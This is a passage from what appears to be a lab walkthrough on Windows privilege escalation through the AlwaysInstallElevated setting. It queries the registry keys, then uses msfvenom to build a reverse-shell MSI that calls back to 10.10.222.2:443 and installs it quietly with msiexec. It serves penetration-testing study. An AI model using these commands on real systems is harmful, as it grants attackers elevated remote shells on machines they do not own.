this files are used for installing applications and it will execute with the current user privileges
now let’s manually find this by quering the HKLM and HKCU registery
HKLM
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
now the HKCU
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
as we see both registers are found
now as those are found so let’s create a malicious msi package using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.222.2 LPORT=443 -f msi -o reverse.msi
now transfare it to the machine
after transfer run
msiexec /quiet /qn /i C:\\PrivEsc\\reverse.msi
now let’s check our listener